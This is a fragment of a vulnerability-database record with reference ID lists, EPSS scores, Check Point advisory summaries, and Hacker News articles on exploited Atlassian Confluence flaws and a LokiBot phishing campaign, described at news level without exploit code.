"rocky", "idList": ["RLSA-2022:1777"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:A10F281EF99381636376D6F6C6501E22", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947"]}, {"type": "seebug", "idList": ["SSV:99168"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1865-1", "OPENSUSE-SU-2016:1868-1", "OPENSUSE-SU-2016:1869-1", "OPENSUSE-SU-2016:1918-1", "OPENSUSE-SU-2021:0513-1", "OPENSUSE-SU-2021:0515-1", 
"OPENSUSE-SU-2021:0592-1", "OPENSUSE-SU-2021:0881-1", "OPENSUSE-SU-2021:0938-1", "OPENSUSE-SU-2021:0948-1", "OPENSUSE-SU-2021:0949-1", "OPENSUSE-SU-2022:0091-1", "OPENSUSE-SU-2022:0103-1", "OPENSUSE-SU-2022:0110-1", "OPENSUSE-SU-2022:0112-1", "OPENSUSE-SU-2022:0114-1", "OPENSUSE-SU-2022:0123-1", "OPENSUSE-SU-2022:0156-1", "OPENSUSE-SU-2022:0705-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B", "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489"]}, {"type": "thn", "idList": ["THN:012EBB2FE2687F178FBCC3AB8ABEF778", "THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:0ADE883013E260B4548F6E16D65487D3", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1B5512B7CB75F82A34395AC39A9B2680", "THN:1B983787EB2BA5D0757F1F83458B7ABE", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:1EFEC00D867275514EA180819C9EF104", "THN:1F783FB04C34EEEF700F6B7C43ED8FA3", "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "THN:222F7713CA968509F8C385BA29B0B6A5", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:4376782A3F009FEED68FDD2022A11EF5", "THN:44DD118DC206D25EB4ECAE95173FE16E", "THN:4B97BCD00CAE89549A57EBFAECA484AE", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:62ECC5B73032124D6559355B66E1C469", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:6A9CD6F085628D08978727C0FF597535", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:6F5BF10AC5A30E497851C9ADE15C774A", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", 
"THN:7A6D54BC76D090840197DDF871D59731", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:9A9EADE3A5D4449C9E0519E22A93B306", "THN:A19D66C10E6D6239DFCE7CD41A974F09", "THN:A24E3ECC17FDA35932981ED1D0B9B351", "THN:A60A19BF44B2CA75E63F31234992BE54", "THN:B399D1943153CEEF405B85D4310C2142", "THN:B7217784F9D53002315C9C43CCC73766", "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:BD014635C5F702379060A20290985162", "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "THN:C19BDA30D2242223E7A434F1E4051E68", "THN:C4188C7A44467E425407D33067C14094", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:CDFC216AC6B26D35C38BDB32822B4E96", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "THN:DCB20559AE0C35EB864725D482E268C2", "THN:DEAEC76D89D5583101E2E6036C289609", "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "THN:E0B486DA1C8CE77D0DF337E8307100D6", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:EC350D7E2CF02EC9CB76AA85E0D3F47A", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "THN:EDC4E93542AFAF751E67BF527C826DA4", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F601EBBE359B3547B8E79F0217562FEF", "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "THN:FFFF05ECDE44C9ED26B53D328B60689B"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:1502920D4F50B0D128077B515815C023", 
"THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:24243FD4F7B9BDBDAC283E15D460128F", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:57E503E30D6F729869ADA40579BF5339", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:65CDAAFAA856DA03BD3115E8BC92F1A0", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:8C179A769DB315AF46676A862FC3D942", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:9673D04DAD513AC05EA6440633D75339", "THREATPOST:A8A7A761CD72E2732BD9E3C75C4A2ACC", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B7A9B20B1E9413BB675D8C2810F1365F", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "THREATPOST:C2E1563DBC065025E810CF457E1A802B", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:DE317ED7C5E4858FE861A15F96F6BCFD", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "TRELLIX:341471F990B5DC7BFF1C28F924F10E32", "TRELLIX:4EE3028711C16E3513FC2CF300440452", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:73420774AE3767CFB11F493B41572174", "TRELLIX:8CB786600FA7F187E3D16B1E340639C2", "TRELLIX:C68274BBC4E0B3B7EFA9290A8C6AA6C2", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": 
EPSS exploitation-probability scores for the CVEs referenced in this post (EPSS value, percentile, and the date each score was last updated):

CVE | EPSS | Percentile | Modified
---|---|---|---
CVE-2016-5128 | 0.00704 | 0.77463 | 2023-05-02
CVE-2021-1732 | 0.00395 | 0.69459 | 2023-05-01
CVE-2021-21195 | 0.00477 | 0.72167 | 2023-05-01
CVE-2021-26084 | 0.97475 | 0.99938 | 2023-05-01
CVE-2021-30551 | 0.33503 | 0.9642 | 2023-05-01
CVE-2021-30983 | 0.00107 | 0.42117 | 2023-05-02
CVE-2021-36942 | 0.88993 | 0.9816 | 2023-05-01
CVE-2021-39793 | 0.00067 | 0.27427 | 2023-05-02
CVE-2021-40444 | 0.96903 | 0.99515 | 2023-05-02
CVE-2022-1096 | 0.00363 | 0.68151 | 2023-05-02
CVE-2022-1232 | 0.00119 | 0.44655 | 2023-05-02
CVE-2022-1364 | 0.00604 | 0.75386 | 2023-05-02
CVE-2022-21882 | 0.1347 | 0.94719 | 2023-05-02
CVE-2022-22587 | 0.00184 | 0.54157 | 2023-05-02
CVE-2022-22620 | 0.00183 | 0.54067 | 2023-05-02
CVE-2022-26134 | 0.97542 | 0.99988 | 2023-05-02
CVE-2022-26925 | 0.97418 | 0.99871 | 2023-05-02
CVE-2022-30190 | 0.9744 | 0.99895 | 2023-05-02

Aggregate vulnersScore: 8.2
Check Point advisory records for the CVEs above (CVSS v3.1 base score, severity and vector; CVSS v2 base score and vector; publication and last-modified dates):

Advisory | Title | CVE(s) | CVSS v3.1 | CVSS v2 | Published / modified | Description
---|---|---|---|---|---|---
CPAI-2021-0487 | Microsoft Active Directory Certificate Services NTLM Relay | CVE-2021-36942, CVE-2022-26925 | 5.9 MEDIUM, CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | 5.0, AV:N/AC:L/Au:N/C:N/I:P/A:N | 2021-07-27 / 2022-05-10 | An NTLM relay vulnerability exists in Microsoft Active Directory Certificate Services. A remote attacker can coerce Windows hosts to authenticate to other machines via the MS-EFSRPC protocol and obtain their NTLM credentials. Successful exploitation could lead to complete takeover of the target domain.
CPAI-2021-0484 | Google Chrome Heap Corruption | CVE-2021-30551 | 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P | 2021-07-26 / 2021-07-26 | A heap corruption vulnerability exists in Google Chrome. Successful exploitation could allow a remote attacker to execute arbitrary code on the affected system.
CPAI-2022-0325 | Apple OS Use After Free | CVE-2022-22620 | 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P | 2022-06-30 / 2022-06-30 | A use-after-free vulnerability exists in Apple OS. Successful exploitation could allow a remote attacker to execute arbitrary code on the affected system.
CPAI-2022-0007 | Microsoft Windows Win32k Elevation of Privilege | CVE-2022-21882 | 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 7.2, AV:L/AC:L/Au:N/C:C/I:C/A:C | 2022-01-11 / 2022-01-11 | An elevation of privilege vulnerability exists in the Microsoft Windows win32k driver. Exploitation is local (AV:L) by an already low-privileged user (PR:L); successful exploitation yields arbitrary code execution with elevated privileges on the affected system.
CPAI-2021-0554 | Microsoft Internet Explorer MSHTML Remote Code Execution | CVE-2021-40444 | 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P | 2021-09-09 / 2021-09-14 | A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation, which requires a user to open a crafted file (UI:R), could allow an attacker to execute arbitrary code on the affected system.
CPAI-2021-0548 | Atlassian Confluence Remote Code Execution | CVE-2021-26084 | 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P | 2021-09-05 / 2022-02-09 | A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation could allow an unauthenticated remote attacker to execute arbitrary code on the affected system.
(record cut off) | Atlassian Confluence (last seen 2022-10-04) | | | | | A remote code execution vulnerability exists in Atlassian Confluence. [the rest of this record is missing from the page]
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-12T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve 
remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": 
"THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized 
environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? 
Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security 
flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe 
disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": 